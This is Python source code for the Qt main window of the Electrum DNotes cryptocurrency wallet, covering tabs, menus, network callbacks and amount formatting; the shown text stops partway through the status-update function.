# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_dnotes import keystore, simple_config
from electrum_dnotes.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_dnotes import constants
from electrum_dnotes.plugins import run_hook
from electrum_dnotes.i18n import _
from electrum_dnotes.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword)
from electrum_dnotes import Transaction
from electrum_dnotes import util, bitcoin, commands, coinchooser
from electrum_dnotes import paymentrequest
from electrum_dnotes.wallet import Multisig_Wallet, AddTransactionException
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
    """Flat, fixed-width icon button used in the status bar.

    Wraps *func* so the callback fires both on click and on pressing
    Return while the button has keyboard focus.
    """
    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25,25))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # Mirror a click when Return is pressed.
        if e.key() == Qt.Key_Return:
            self.func()
from electrum_dnotes.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
    # Qt signals used to marshal work from network/background threads
    # onto the GUI thread.
    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    notify_transactions_signal = pyqtSignal()
    new_fx_quotes_signal = pyqtSignal()
    new_fx_history_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)  # (event name, args tuple)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
    """Build the main wallet window: tabs, menus, shortcuts, and the
    network-callback wiring for the given wallet."""
    QMainWindow.__init__(self)

    self.gui_object = gui_object
    self.config = config = gui_object.config
    self.setup_exception_hook()
    self.network = gui_object.daemon.network
    self.fx = gui_object.daemon.fx
    self.invoices = wallet.invoices
    self.contacts = wallet.contacts
    self.tray = gui_object.tray
    self.app = gui_object.app
    # Miscellaneous window state flags and holders.
    self.cleaned_up = False
    self.is_max = False
    self.payment_request = None
    self.checking_accounts = False
    self.qr_window = None
    self.not_enough_funds = False
    self.pluginsdialog = None
    self.require_fee_update = False
    self.tx_notifications = []   # transactions queued for desktop notification
    self.tl_windows = []         # stack of top-level (dialog) windows
    self.tx_external_keypairs = {}

    self.create_status_bar()
    self.need_update = threading.Event()

    self.decimal_point = config.get('decimal_point', 8)
    self.num_zeros = int(config.get('num_zeros',0))

    self.completions = QStringListModel()

    # Mandatory tabs first; optional tabs are added via add_optional_tab.
    self.tabs = tabs = QTabWidget(self)
    self.send_tab = self.create_send_tab()
    self.receive_tab = self.create_receive_tab()
    self.addresses_tab = self.create_addresses_tab()
    self.utxo_tab = self.create_utxo_tab()
    self.console_tab = self.create_console_tab()
    self.contacts_tab = self.create_contacts_tab()
    tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
    tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
    tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))

    def add_optional_tab(tabs, tab, icon, description, name):
        # Tag the tab so toggle_tab() can later re-insert it at the right spot.
        tab.tab_icon = icon
        tab.tab_description = description
        tab.tab_pos = len(tabs)
        tab.tab_name = name
        if self.config.get('show_{}_tab'.format(name), tab.tab_name == 'addresses'):
            tabs.addTab(tab, icon, description.replace("&", ""))

    add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
    add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
    add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
    add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")

    tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
    self.setCentralWidget(tabs)

    if self.config.get("is_maximized"):
        self.showMaximized()

    self.setWindowIcon(QIcon(":icons/electrum-dnotes.png"))
    self.init_menubar()

    # Keyboard shortcuts; weakref proxy so they don't keep the tab widget
    # alive after the window is closed.
    wrtabs = weakref.proxy(tabs)
    QShortcut(QKeySequence("Ctrl+W"), self, self.close)
    QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
    QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
    QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
    QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))

    for i in range(wrtabs.count()):
        # i=i binds the loop variable now (avoids late-binding closures).
        QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))

    self.payment_request_ok_signal.connect(self.payment_request_ok)
    self.payment_request_error_signal.connect(self.payment_request_error)
    self.notify_transactions_signal.connect(self.notify_transactions)
    self.history_list.setFocus(True)

    # network callbacks
    if self.network:
        self.network_signal.connect(self.on_network_qt)
        interests = ['updated', 'new_transaction', 'status',
                     'banner', 'verified', 'fee']
        # To avoid leaking references to "self" that prevent the
        # window from being GC-ed when closed, callbacks should be
        # methods of this class only, and specifically not be
        # partials, lambdas or methods of subobjects. Hence...
        self.network.register_callback(self.on_network, interests)
        # set initial message
        self.console.showMessage(self.network.banner)
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
        self.new_fx_quotes_signal.connect(self.on_fx_quotes)
        self.new_fx_history_signal.connect(self.on_fx_history)

    # update fee slider in case we missed the callback
    self.fee_slider.update()
    self.load_wallet(wallet)
    self.connect_slots(gui_object.timer)
    self.fetch_alias()
def on_history(self, b):
    """Network-thread 'on_history' callback; bounce to the GUI thread."""
    self.new_fx_history_signal.emit()
def setup_exception_hook(self):
    # Install the crash-reporter hook so uncaught exceptions raised in this
    # window are reported to the user instead of being silently dropped.
    Exception_Hook(self)
def on_fx_history(self):
    """GUI-thread handler: fiat history rates changed; refresh the views."""
    history_view = self.history_list
    history_view.refresh_headers()
    history_view.update()
    self.address_list.update()
def on_quotes(self, b):
    """Network-thread 'on_quotes' callback; bounce to the GUI thread."""
    self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
    """GUI-thread handler: a new fiat exchange rate arrived."""
    self.update_status()
    # Refresh edits with the new rate
    edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
    edit.textEdited.emit(edit.text())
    edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
    edit.textEdited.emit(edit.text())
    # History tab needs updating if it used spot
    if self.fx.history_used_spot:
        self.history_list.update()
def toggle_tab(self, tab):
    """Show or hide an optional tab, persisting the choice in the config
    and keeping the tab order defined by tab.tab_pos."""
    show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
    self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
    item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
    tab.menu_action.setText(item_text)
    if show:
        # Find out where to place the tab
        index = len(self.tabs)
        for i in range(len(self.tabs)):
            try:
                # Permanent tabs have no tab_pos; the AttributeError skips them.
                if tab.tab_pos < self.tabs.widget(i).tab_pos:
                    index = i
                    break
            except AttributeError:
                pass
        self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
    else:
        i = self.tabs.indexOf(tab)
        self.tabs.removeTab(i)
def push_top_level_window(self, window):
    """Register *window* as the current top-level window.

    Used e.g. by the tx dialog so that new dialogs get parented correctly;
    hardware-wallet prompts cannot pass an explicit parent themselves.
    """
    self.tl_windows.append(window)
def pop_top_level_window(self, window):
    """Unregister a window previously pushed with push_top_level_window."""
    self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
    '''Do the right thing in the presence of tx dialog windows'''
    candidate = self.tl_windows[-1] if self.tl_windows else None
    # Only forward the override when it satisfies test_func (if given).
    if candidate and test_func and not test_func(candidate):
        candidate = None
    return self.top_level_window_recurse(candidate, test_func)
def diagnostic_name(self):
    # Used by PrintError to prefix log lines: "<base name>/<wallet basename>".
    return "%s/%s" % (PrintError.diagnostic_name(self),
                      self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
    """Return True when the window is minimized or not shown at all."""
    if self.isMinimized():
        return True
    return self.isHidden()
def show_or_hide(self):
    """Toggle window visibility (tray-icon click behaviour)."""
    action = self.bring_to_top if self.is_hidden() else self.hide
    action()
def bring_to_top(self):
    """Unhide the window and raise it above sibling windows."""
    self.show()
    self.raise_()
def on_error(self, exc_info):
    """Default background-task error handler: log the traceback and show
    the error to the user, except for deliberate user cancellations."""
    exc = exc_info[1]
    if isinstance(exc, UserCancelled):
        return  # user aborted on purpose; nothing to report
    traceback.print_exception(*exc_info)
    self.show_error(str(exc))
def on_network(self, event, *args):
    """Network-thread callback; forward events toward the GUI thread."""
    if event == 'updated':
        # Cheap flag only; timer_actions() performs the refresh on the GUI thread.
        self.need_update.set()
        self.gui_object.network_updated_signal_obj.network_updated_signal \
            .emit(event, args)
    elif event == 'new_transaction':
        # Queue the tx; notify_transactions() (GUI thread) drains the queue.
        self.tx_notifications.append(args[0])
        self.notify_transactions_signal.emit()
    elif event in ['status', 'banner', 'verified', 'fee']:
        # Handle in GUI thread
        self.network_signal.emit(event, args)
    else:
        self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
    # Handle a network message in the GUI thread
    if event == 'status':
        self.update_status()
    elif event == 'banner':
        self.console.showMessage(args[0])
    elif event == 'verified':
        self.history_list.update_item(*args)
    elif event == 'fee':
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.do_update_fee()
    elif event == 'fee_histogram':
        # NOTE(review): on_network above only forwards 'status', 'banner',
        # 'verified' and 'fee', so this branch looks unreachable from there —
        # verify whether 'fee_histogram' is emitted by another caller.
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.do_update_fee()
        # todo: update only unconfirmed tx
        self.history_list.update()
    else:
        self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
    """Resolve the configured OpenAlias in a background thread.

    Stores the result in self.alias_info and emits alias_received_signal
    when the lookup finishes. No-op when no alias is configured.
    """
    self.alias_info = None
    alias = self.config.get('alias')
    if alias:
        alias = str(alias)
        def f():
            self.alias_info = self.contacts.resolve_openalias(alias)
            self.alias_received_signal.emit()
        t = threading.Thread(target=f)
        # Daemon thread so a slow DNS lookup cannot block interpreter exit.
        # (Thread.setDaemon() is deprecated in favour of the attribute.)
        t.daemon = True
        t.start()
def close_wallet(self):
    """Log the wallet being released and let plugins clean up."""
    if self.wallet:
        self.print_error('close_wallet', self.wallet.storage.path)
        run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
    """Attach *wallet* to this window and refresh every view and menu."""
    wallet.thread = TaskThread(self, self.on_error)
    self.wallet = wallet
    self.update_recently_visited(wallet.storage.path)
    # address used to create a dummy transaction and estimate transaction fee
    self.history_list.update()
    self.address_list.update()
    self.utxo_list.update()
    self.need_update.set()
    # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
    self.notify_transactions()
    # update menus
    self.seed_menu.setEnabled(self.wallet.has_seed())
    self.update_lock_icon()
    self.update_buttons_on_seed()
    self.update_console()
    self.clear_receive_tab()
    self.request_list.update()
    self.tabs.show()
    self.init_geometry()
    # Start hidden in the tray when configured and the tray icon is visible.
    if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
        self.hide()
    else:
        self.show()
    self.watching_only_changed()
    run_hook('load_wallet', wallet, self)
def init_geometry(self):
    """Restore the saved window geometry, falling back to a default."""
    winpos = self.wallet.storage.get("winpos-qt")
    try:
        screen = self.app.desktop().screenGeometry()
        # assert doubles as validation here; winpos may be None/malformed or
        # reference a screen that is no longer attached.
        assert screen.contains(QRect(*winpos))
        self.setGeometry(*winpos)
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit; Exception is sufficient for the failure modes above.
        self.print_error("using default geometry")
        self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
    """Refresh the window title and menu availability after the wallet's
    watching-only state (possibly) changed."""
    name = "Electrum DNotes Testnet" if constants.net.TESTNET else "Electrum DNotes"
    title = '%s %s - %s' % (name, self.wallet.electrum_version,
                            self.wallet.basename())
    extra = [self.wallet.storage.get('wallet_type', '?')]
    if self.wallet.is_watching_only():
        self.warn_if_watching_only()
        extra.append(_('watching only'))
    title += ' [%s]'% ', '.join(extra)
    self.setWindowTitle(title)
    # Enable only the actions the wallet type supports.
    self.password_menu.setEnabled(self.wallet.may_have_password())
    self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
    self.import_address_menu.setVisible(self.wallet.can_import_address())
    self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
    """Pop a warning dialog when the wallet cannot sign transactions."""
    if self.wallet.is_watching_only():
        # Fixed user-facing typo: "DNotess" -> "DNotes" (twice).
        msg = ' '.join([
            _("This wallet is watching-only."),
            _("This means you will not be able to spend DNotes with it."),
            _("Make sure you own the seed phrase or the private keys, before you request DNotes to be sent to this wallet.")
        ])
        self.show_warning(msg, title=_('Information'))
def open_wallet(self):
    """Prompt the user for a wallet file and open it in a new window."""
    try:
        folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    filename, _selected_filter = QFileDialog.getOpenFileName(
        self, "Select your wallet file", folder)
    if filename:
        self.gui_object.new_window(filename)
def backup_wallet(self):
    """Ask for a destination and copy the current wallet file there."""
    path = self.wallet.storage.path
    wallet_folder = os.path.dirname(path)
    filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
    if not filename:
        return
    new_path = os.path.join(wallet_folder, filename)
    if new_path != path:
        try:
            # copy2 preserves metadata (timestamps, permissions).
            shutil.copy2(path, new_path)
            self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
        except BaseException as reason:
            self.show_critical(_("Electrum DNotes was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
    """Move *filename* to the front of the recently-open list (max 5) and
    rebuild the corresponding menu with Ctrl+1..5 shortcuts."""
    recent = self.config.get('recently_open', [])
    try:
        # Sortability probe: a corrupt config entry (mixed types) resets
        # the whole list. The sorted() result itself is discarded here.
        sorted(recent)
    except:
        recent = []
    if filename in recent:
        recent.remove(filename)
    recent.insert(0, filename)
    recent = recent[:5]
    self.config.set_key('recently_open', recent)
    self.recently_visited_menu.clear()
    for i, k in enumerate(sorted(recent)):
        b = os.path.basename(k)
        def loader(k):
            # bind k now; a bare lambda would late-bind the loop variable
            return lambda: self.gui_object.new_window(k)
        self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
    self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
    """Return the directory containing the currently configured wallet file."""
    wallet_path = os.path.abspath(self.config.get_wallet_path())
    return os.path.dirname(wallet_path)
def new_wallet(self):
    """Pick the first free wallet_<n> filename and open the creation wizard."""
    try:
        folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    index = 1
    # Find the first wallet_<n> name not already present in the folder.
    while ("wallet_%d" % index) in os.listdir(folder):
        index += 1
    full_path = os.path.join(folder, "wallet_%d" % index)
    self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
    """Build the full application menu bar (File/Wallet/View/Tools/Help)."""
    menubar = QMenuBar()

    # --- File menu ---
    file_menu = menubar.addMenu(_("&File"))
    self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
    file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
    file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
    file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
    file_menu.addAction(_("Delete"), self.remove_wallet)
    file_menu.addSeparator()
    file_menu.addAction(_("&Quit"), self.close)

    # --- Wallet menu ---
    wallet_menu = menubar.addMenu(_("&Wallet"))
    wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
    wallet_menu.addSeparator()
    # Several actions are kept as attributes so watching_only_changed() /
    # update_buttons_on_seed() can enable or hide them later.
    self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
    self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
    self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
    self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
    self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
    self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
    self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
    wallet_menu.addSeparator()

    addresses_menu = wallet_menu.addMenu(_("&Addresses"))
    addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
    labels_menu = wallet_menu.addMenu(_("&Labels"))
    labels_menu.addAction(_("&Import"), self.do_import_labels)
    labels_menu.addAction(_("&Export"), self.do_export_labels)
    history_menu = wallet_menu.addMenu(_("&History"))
    history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
    #history_menu.addAction(_("&Summary"), self.history_list.show_summary)
    #history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
    history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
    contacts_menu = wallet_menu.addMenu(_("Contacts"))
    contacts_menu.addAction(_("&New"), self.new_contact_dialog)
    contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
    contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
    invoices_menu = wallet_menu.addMenu(_("Invoices"))
    invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
    invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
    wallet_menu.addSeparator()
    wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))

    # --- View menu (optional tab toggles) ---
    def add_toggle_action(view_menu, tab):
        is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
        item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
        tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
    view_menu = menubar.addMenu(_("&View"))
    add_toggle_action(view_menu, self.addresses_tab)
    add_toggle_action(view_menu, self.utxo_tab)
    add_toggle_action(view_menu, self.contacts_tab)
    add_toggle_action(view_menu, self.console_tab)

    # --- Tools menu ---
    tools_menu = menubar.addMenu(_("&Tools"))
    # Settings / Preferences are all reserved keywords in macOS using this as work around
    tools_menu.addAction(_("Electrum DNotes preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
    tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
    #tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
    tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
    tools_menu.addSeparator()
    paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
    raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
    raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
    raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
    raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
    #raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
    self.raw_transaction_menu = raw_transaction_menu
    run_hook('init_menubar_tools', self, tools_menu)

    # --- Help menu ---
    help_menu = menubar.addMenu(_("&Help"))
    help_menu.addAction(_("&About"), self.show_about)
    help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://github.com/DNotesCoin/electrum-dnotes"))
    help_menu.addSeparator()
    help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("https://github.com/DNotesCoin/electrum-dnotes")).setShortcut(QKeySequence.HelpContents)
    help_menu.addAction(_("&Report Bug"), self.show_report_bug)
    help_menu.addSeparator()
    #help_menu.addAction(_("&Donate to server"), self.donate_to_server)

    self.setMenuBar(menubar)
def donate_to_server(self):
    """Open the send tab pre-filled with the server's donation address."""
    addr = self.network.get_donation_address()
    if not addr:
        self.show_error(_('No donation address for this server'))
        return
    host = self.network.get_parameters()[0]
    self.pay_to_URI('dnotes:%s?message=donation for %s' % (addr, host))
def show_about(self):
    """Show the About dialog with version and project blurb."""
    # NOTE(review): the inner _() call is nested inside the outer _()'s
    # argument via string concatenation, so the combined string is what gets
    # looked up for translation — presumably unintended; verify.
    QMessageBox.about(self, "Electrum DNotes",
                      _("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
                      _("Electrum DNotes's focus is speed, with low resource usage and simplifying DNotes. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the DNotes system." + "\n\n" +
                        _("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
    """Show instructions for filing bug reports on the project tracker."""
    msg = ' '.join([
        _("Please report any bugs as issues on github:<br/>"),
        "<a href=\"https://github.com/DNotesCoin/electrum-dnotes/issues\">https://github.com/DNotesCoin/electrum-dnotes/issues</a><br/><br/>",
        _("Before reporting a bug, upgrade to the most recent version of Electrum DNotes (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs.")
    ])
    self.show_message(msg, title="Electrum DNotes - " + _("Reporting Bugs"))
def notify_transactions(self):
    """Show desktop notifications for transactions queued by the network thread.

    Three or more pending transactions are collapsed into one summary
    notification; fewer are announced individually. Only incoming value
    (v > 0) is reported. The queue is drained in both cases.
    """
    if not self.network or not self.network.is_connected():
        return
    self.print_error("Notifying GUI")
    if len(self.tx_notifications) > 0:
        # Combine the transactions if there are at least three
        num_txns = len(self.tx_notifications)
        if num_txns >= 3:
            total_amount = 0
            for tx in self.tx_notifications:
                is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
                if v > 0:
                    total_amount += v
            self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
                        .format(num_txns, self.format_amount_and_units(total_amount)))
            self.tx_notifications = []
        else:
            # Drain a snapshot of the queue: the previous code removed
            # entries from the list while iterating it, which skipped
            # every other transaction.
            txns, self.tx_notifications = self.tx_notifications, []
            for tx in txns:
                if tx:
                    is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
                    if v > 0:
                        self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
    """Show a system-tray balloon message, tolerating older Qt signatures."""
    if self.tray:
        try:
            # this requires Qt 5.9
            self.tray.showMessage("Electrum DNotes", message, QIcon(":icons/electrum-dnotes_dark_icon"), 20000)
        except TypeError:
            # Older Qt: fall back to the enum-based overload.
            self.tray.showMessage("Electrum DNotes", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
    """Open-file dialog starting in the last-used directory ('io_dir')."""
    directory = self.config.get('io_dir', os.path.expanduser('~'))
    fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
    if fileName and directory != os.path.dirname(fileName):
        # Remember the newly chosen directory for next time.
        self.config.set_key('io_dir', os.path.dirname(fileName), True)
    return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
    """Hook this window's periodic work onto the app-wide timer signal."""
    sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
    """Periodic maintenance driven by the application timer."""
    # Note this runs in the GUI thread
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    # update fee
    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Render a satoshi amount using the window's configured precision."""
    return format_satoshis(
        x, self.num_zeros, self.decimal_point,
        is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
    """Format *amount* with the base unit, plus a fiat equivalent if enabled."""
    text = self.format_amount(amount) + ' '+ self.base_unit()
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text += ' (%s)'%fiat
    return text
def format_fee_rate(self, fee_rate):
    """Render a fee rate given in sat/kB as human-readable sat/byte text."""
    per_byte = fee_rate / 1000
    return format_fee_satoshis(per_byte, self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
    """Return the decimal precision of the currently selected base unit."""
    return self.decimal_point
def base_unit(self):
    """Return the unit label matching self.decimal_point (2/5/8)."""
    unit_by_dp = {2: 'bits', 5: 'mNOTE', 8: 'NOTE'}
    assert self.decimal_point in [2, 5, 8]
    if self.decimal_point in unit_by_dp:
        return unit_by_dp[self.decimal_point]
    raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a DNotes amount edit and its fiat twin in sync.

    Whichever field the user edits becomes authoritative; the other field
    is recomputed from the current exchange rate. The 'follows' flag on
    each edit suppresses feedback loops while one field programmatically
    updates the other. fee_e may be None (receive tab has no fee field).
    """
    def edit_changed(edit):
        if edit.follows:
            # change was triggered by us updating the twin field - ignore
            return
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # no usable rate or empty amount: blank the counterpart(s)
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False
    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the status-bar text/icon and tray tooltip from wallet and network state."""
    if not self.wallet:
        return
    if self.network is None or not self.network.is_running():
        text = _("Offline")
        icon = QIcon(":icons/status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            text = _("Synchronizing...")
            icon = QIcon(":icons/status_waiting.png")
        elif server_lag > 1:
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = QIcon(":icons/status_lagging.png")
        else:
            # fully synced: show the confirmed/unconfirmed/unmatured balance
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
